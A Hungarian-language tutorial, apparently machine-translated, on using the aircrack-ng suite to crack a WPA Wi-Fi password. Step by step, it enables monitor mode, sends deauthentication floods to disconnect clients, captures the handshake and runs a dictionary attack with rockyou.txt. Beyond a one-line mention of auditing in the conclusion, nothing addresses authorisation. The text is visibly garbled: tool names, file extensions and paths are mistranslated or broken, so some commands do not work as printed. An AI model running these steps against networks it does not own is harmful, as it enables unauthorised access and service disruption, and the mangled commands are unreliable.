Airmon-ng
Az Airmon-ng a vezeték nélküli kártyamódok kezelésére és a felesleges folyamatok leölésére szolgál az aircrack-ng használata közben. A vezeték nélküli kapcsolat szippantásához meg kell változtatnia a vezeték nélküli kártyát felügyelt módról monitor módra, és az airmon-ng-t erre a célra használják.
Airodump-ng
Az Airodump-ng egy vezeték nélküli szippantó, amely vezeték nélküli adatokat képes rögzíteni egy vagy több vezeték nélküli hozzáférési pontról. A közeli hozzáférési pontok elemzésére és kézfogások rögzítésére használják.
Aireplay-ng
Az Aireplay-ng visszajátszási támadásokhoz és csomag-injektorként használható. Lehet de-hitelesíteni a felhasználókat a hozzáférési pontjukról a kézfogások rögzítésére.
Airdecap-ng
Az Airdecap-ng titkosított WEP, WPA / WPA2 vezeték nélküli csomagok dekódolására szolgál ismert kulccsal.
Repülőtér-ng
Az Aircrack-ng a WPA / WEP vezeték nélküli protokollok megtámadására szolgál a kulcs megtalálásához.
Telepítés
Az Aircrack-ng könnyen telepíthető az Ubuntuba az APT használatával. Csak írja be a következő parancsot, és ezzel telepíti az Aircrack-ng csomagban elérhető összes eszközt.
sudo apt-get frissítéssudo apt-get install -y aircrack-ng
Használat
Ebben a cikkben gyorsan áttekintjük, hogyan használhatjuk az aircrack-ng titkosított vezeték nélküli hálózatot (ebben a példában TR1CKST3R) a jelszó megtalálásához.
Először sorolja fel az összes rendelkezésre álló vezeték nélküli kártyát, amely az 'iwconfig' paranccsal csatlakozik a számítógépéhez.
Ehhez az oktatóanyaghoz a „wlxc83a35cb4546” nevű vezeték nélküli kártyát fogjuk használni (ez az Ön esetében más lehet). Öld meg az összes vezeték nélküli kártyán futó folyamatot az airmon-ng segítségével.
[e-mail védett]: ~ $ sudo airmon-ng check killIndítsa el a Monitor módot a 'wlxc83a35cb4546' címen gépeléssel
[e-mail védett]: ~ $ sudo airmon-ng start wlxc83a35cb4546
Az airmon-ng elindította a Monitor módot a vezeték nélküli kártyán, és más néven jelenik meg: 'wlan0mon'. Futtassa újra az „iwconfig” elemet a vezeték nélküli adatok felsorolásához.
Ezután az airodump-ng segítségével megtekintheti a közeli vezeték nélküli hozzáférési pontokat és azok tulajdonságait.
[e-mail védett]: ~ $ sudo airodump-ng wlan0mon
Szűkítheti a keresést a MAC (-bssid) és a csatorna (-c) szűrőkkel. A kézfogás rögzítéséhez (a kézfogás titkosított jelszót tartalmaz) el kell mentenünk a csomagjainkat valahova a „-write” opcióval. típus,
[e-mail védett]: ~ $ sudo airodump-ng --bssid 6C: B7: 49: FC: 62: E4-c 11 wlan0mon --write / tmp / kézfogás.sapka
--bssid: Hozzáférési pont MAC-címe
-c: Hozzáférési pont csatornája [1-13]
--write: A rögzített csomagokat meghatározott helyen tárolja
Most minden eszközt hitelesítenünk kell erről az Access Pointról az Aireplay-ng segédprogram segítségével. Ír
[e-mail védett]: ~ $ sudo aireplay-ng -0 100 -a [MAC_ADD] wlan0mon
-a: Adja meg a MAC hozzáférési pontokat az Aireplay-ng számára
-0: Adja meg az elküldendő csomagok számát
Egy idő után minden eszköz leválik az adott hozzáférési pontról, amikor megpróbálják újracsatlakozni, a futó airodump-ng rögzíti a kézfogást. A futó airodump-ng tetején jelenik meg.
A kézfogás a '/ tmp /' könyvtárban van tárolva, és tartalmaz egy titkosított jelszót, amelyet offline módban lehet kényszeríteni egy szótár használatával. A jelszó feltöréséhez az Aircrack-ng fájlt fogjuk használni. típus
[e-mail védett]: ~ $ sudo aircrack-ng / tmp / handshake.cap-01.sapka -w/ usr / share / wordlists / rockyou.txt
-w: Adja meg a szótár helyét
Az Aircrack-ng végigmegy a jelszavak listáján, és ha megtalálta, megjeleníti a kulcsként használt jelszót.
Ebben az esetben az aircrack-ng megtalálta a használt '123456789' jelszót.
Most állítsa le a Monitor módot a vezeték nélküli kártyán, és indítsa újra a hálózatkezelőt.
[e-mail védett]: ~ $ sudo airmon-ng stop wlan0mon[e-mail védett]: ~ $ sudo service network-manager restart
Következtetés
Az Aircrack-ng a vezeték nélküli biztonság ellenőrzésére vagy az elfelejtett jelszavak feltörésére használható. Van még néhány hasonló eszköz erre a célra, mint például a Kismet, de az aircrack-ng jobban ismert jó támogatásáról, sokoldalúságáról és sokféle eszközzel. Könnyen használható parancssori felülettel rendelkezik, amely könnyen automatizálható bármilyen szkriptnyelv használatával, például a Python.